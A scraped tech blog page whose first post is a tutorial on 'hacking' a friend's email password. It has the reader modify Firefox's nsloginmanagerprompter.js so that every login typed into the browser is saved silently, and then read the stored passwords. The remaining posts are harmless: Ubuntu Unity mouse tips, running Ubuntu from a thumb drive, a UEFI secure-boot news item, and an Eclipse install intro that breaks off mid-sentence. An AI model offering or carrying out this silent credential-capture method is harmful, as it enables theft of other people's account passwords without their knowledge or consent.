Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Previously, I posted a Firefox hack in which hacker steals signons file which enables him to hack Email account passwords saved in victim’s Firefox. In this article, instead of stealing signons we will configure our Firefox to autsave all login information. Thus, if your friend tries to login to his account by using your Firefox browser, his login information will be automatically saved in your Firefox and thus, you will be able to hack email account password of your friend.
How to hack Email account

How to hack Email Account password:

Usually, whenever you try to login to your account, Firefox asks you whether your login information should be saved or not. Firefox will remember your password only if you hit on “Remember”.
Firefox confirmation bar
But, this confirmation bar becomes a headache when victim tries to login to his account using your computer. So, to hack Email account password of your victim, we will remove this confirmation bar and configure Firefox to autosave every password without asking for any confirmation.
Note: If you are trying this hack, remember to backup your nsloginmanagerprompter.js file before moving to further section. For backup, go to

C:\Program Files\Mozilla Firefox\Componenets
and copy nsloginmanagerprompter.js file. Save this copied file to a safe location so that you can use this file to rollback your default Firefox configuration.

Steps to Hack Email Account:

1. Download Notepad++ and install it on your computer.
Password: techotoys.blogspot.com
2. Go to

C:\Program Files\Mozilla Firefox\Components
and look for nsloginmanagerprompter.js file. Right click on it and hit on “Edit with Notepad++”.
3. Now, move to line 804. Replace the entire code from line 804 to line 869 with the following code:

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
Hack Email account password using Firefox
4. Now, go to File ->Save As and save the file on your Desktop. Now, copy this file and paste it in Components folder (C:\Program Files\Mozilla Firefox\Components). You will be asked whether to replace the existing file. Hit on “Copy and Replace”.
That’s it. We have configured Firefox and now, whenever anyone tries to login to his account using Firefox, his login information will be autosaved by Firefox without asking for any confirmation. You can try this in your Firefox.
To see the autosaved passwords go to Tools ->Options ->Security. Hit on “Saved Passwords” and on the popup box, hit on “Show Passwords”. You can thus hack email account of your friend by using this Firefox hack.
So friends, this was a little Firefox hack to hack Email account of your friends. Note that for this hack to work, your friend should login to his account using your Firefox. If you have any problem in this Firefox trick to hack Email account password, please mention it in comments.

Mouse Shortcuts/Tricks for Ubuntu Unity

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Clicking and holding an icon and then dragging it around will allow you to reorder it on the launcher. You can also drag it off to the right of the launcher to move it around. Note that you need to make an explicit movement to the right to move the icon off the launcher before you can move it around.
  • Dragging and Dropping an icon into the trash can will remove it from the Launcher.
  • Moving and holding the cursor on the left side for a few seconds will launch Unity dock.
  • Moving the cursor to top-left corner(near Ubuntu icon) will launch Unity dock as well.
  • Scrolling the mouse wheel while over the Launcher scrolls the icons if you have too many and need to move around quickly.
  • By Scrolling the mouse wheel while over the Sound icon on top panel helps you increase or decrease system volume.
  • Middle click on an application’s launcher icon – Open a new instance of the application in a new window. Very useful at times. In laptops with touchpads, hitting left/right click buttons together is akin to middle click.
  • Maximizing – Dragging a window to the top panel will maximize it.
  • Restore/Unmaximize – Dragging the top panel down OR double clicking on the top panel will do.
  • Tiling – Dragging a Window to the left/right border will auto tile it to that side of the screen. One of the highlights of new Unity experience

Run Ubuntu Linux from a Thumb Drive in Windows 7

ubuntu desktop
Many of us who want to have dual operating systems simply split our hard drive and install both. Not exactly a complex procedure these days. Why just a few weeks ago we showed you how to run Win7 and Ubuntu on the same machine. However, instead of hassling with partitions, simply install an entire Ubuntu OS on a thumb drive and carry it around in your pocket.
ubuntu programming
Then, each time you want to run Ubuntu on your Windows PC simply plug in the thumb drive and away you go.  It’s worth noting that you’re not actually running a separate OS per say. What you’re actually doing is running Ubuntu in Windows as though it was a program. So when you maximise it all you see is the Ubuntu interface.

What’s more, when you make changes or bring new programs into Ubuntu it saves itself. That means that when you plug in the Ubuntu thumb drive at a later date everything will be like you left it as if your PC was actually running Ubuntu.  The guide is written in simple language and even contains the video below which will guide you through the whole deal. This doesn’t take a programming genius. All you need is a large thumb drive, the latest edition of Ubuntu.

Warning: Windows 8 Certified Computers Might Not Boot Linux

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

If the article published by ITWorld is to be believed, all Windows 8-certified machines now use UEFI (Unified Extensible Firmware Interface) with support for secure booting. Microsoft is no longer willing to use untrusted BIOS firmware for booting and this clearly indicates that from Windows 8 onwards both the firmware and software must have been signed by a trusted Certificate Authority to initiate the boot process. You won’t be able to boot a Linux distribution if you have bought a computer that includes the manufacturer’s keys and Microsoft’s keys as none of the EFI Linux bootloaders is signed. This also means that from now onwards you cannot compile your own custom kernels as Linux distribution requires secure UEFI booting support, and a non-GPL bootloader would be required and the kernel would have to be signed too.

how to install Eclipse IDE on Ubuntu 11.10

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Integrated Development Environment or IDE provides a very convenient environment for software development as it automates a lot of boring/complex tasks. Although some programmers do not prefer to use any IDE (specifically ruby programmers – they use TextMate or gedit or other powerful text editors) but java programmers uses IDE in most of the cases because having an IDE makes a lot of jobs much easier. So it means the need of IDE also depends on the type of programming language and the complexity of the project. Since, Java is based on configuration over convention paradigm so an IDE is a must have tool (for Java developers) to automate a lot of tasks, thus it saves a lot of time for coding the actual stuffs.
Ubuntu (latest version 11.10 beta2) has now become the most popular Linux desktop and it has pretty good reputation among programmers – specifically java
